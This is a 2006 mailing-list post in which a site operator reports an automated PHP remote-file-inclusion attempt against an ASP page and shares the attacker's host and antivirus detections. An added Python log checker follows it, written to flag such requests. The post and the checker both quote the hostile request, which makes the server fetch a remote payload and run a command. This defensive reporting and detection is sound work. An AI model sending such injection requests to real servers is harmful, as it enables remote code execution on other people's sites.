Date: Mon Jan 9 17:04:37 2006
From: mducharme at cybergeneration.com (Maxime Ducharme)
Subject: Sidewinder Command/Safemode Exploit 4.1 (PHP.Chaploit)

Hello

we got hit by what looks like a bot trying to inject PHP.Chaploit in our sites

Host is in 202.226.224.*
User-Agent : lwp-trivial/1.35

the bot hit one of our dynamic pages (ASP) trying to inject the PHP script located on
http://www.foxcf.hpgvip.com.br/cse.gif

Full URL was
ourpage.asp?ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado

obviously trying to inject PHP in ASP isn't a good idea, that's what makes me think this is an automated (and dumb) attack

Virustotal says :

AntiVir    6.33.0.75  01.09.2006  Linux/Rootkit
Avast      4.6.695.0  01.09.2006  PHP:Chaploit
Avira      6.33.0.75  01.09.2006  Linux/Rootkit
DrWeb      4.33       01.09.2006  PHP.Chaploit
Kaspersky  4.0.2.24   01.09.2006  Exploit.PHP.e
McAfee     4669       01.06.2006  PHP/Chaploit

(others didn't detect anything)

I also advised the sysadmin of the web server hosting this file.

I just wanted to share this information with the community

have a nice day

Maxime Ducharme
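Added example, not part of the original post: a small log check for the request pattern reported above (a query-string value carrying an absolute URL, a cmd parameter alongside it, and an LWP User-Agent). The space-separated log layout, the placeholder client IPs, the function names and the extra libwww-perl match are assumptions made for illustration; only the first query string and the lwp-trivial User-Agent come from the post.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines (assumption): ip method uri-stem uri-query status user-agent
# Line 1 reuses the query string and User-Agent quoted in the post; IPs are placeholders.
SAMPLE_LOG = """\
192.0.2.10 GET /ourpage.asp ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado 200 lwp-trivial/1.35
198.51.100.7 GET /ourpage.asp ID=42 200 Mozilla/4.0+(compatible;+MSIE+6.0)
198.51.100.8 GET /redirect.asp next=%68ttp%3A%2F%2Fexample.invalid%2Fx.gif%3F 200 Mozilla/4.0+(compatible;+MSIE+6.0)
203.0.113.5 GET /search.asp q=what+is+http 200 lwp-trivial/1.35
"""

URL_IN_VALUE = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)
SCRIPTED_UA = re.compile(r"^(?:lwp-trivial|libwww-perl)/", re.IGNORECASE)


def inspect(line):
    """Return (client ip, reasons) for one log line."""
    ip, method, stem, query, status, agent = line.split(" ", 5)
    # parse_qsl percent-decodes values, so %68ttp%3A%2F%2F is seen as http://
    params = parse_qsl(query, keep_blank_values=True)
    # search(), not match(): in the reported request the value is "ID=http://..."
    reasons = [f"remote-url-in:{name}" for name, value in params
               if URL_IN_VALUE.search(value)]
    if reasons and any(name.lower() == "cmd" for name, _ in params):
        reasons.append("cmd-param-with-remote-url")
    if SCRIPTED_UA.match(agent):
        reasons.append(f"scripted-client:{agent}")
    return ip, reasons


def scan(log_text):
    """Inspect every non-empty line; keep only lines with at least one reason."""
    hits = []
    for line in log_text.splitlines():
        if line.strip():
            ip, reasons = inspect(line)
            if reasons:
                hits.append((ip, reasons))
    return hits


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The User-Agent match alone is a weak signal, since legitimate scripts use LWP as well; the URL-in-parameter reason is the one worth alerting on.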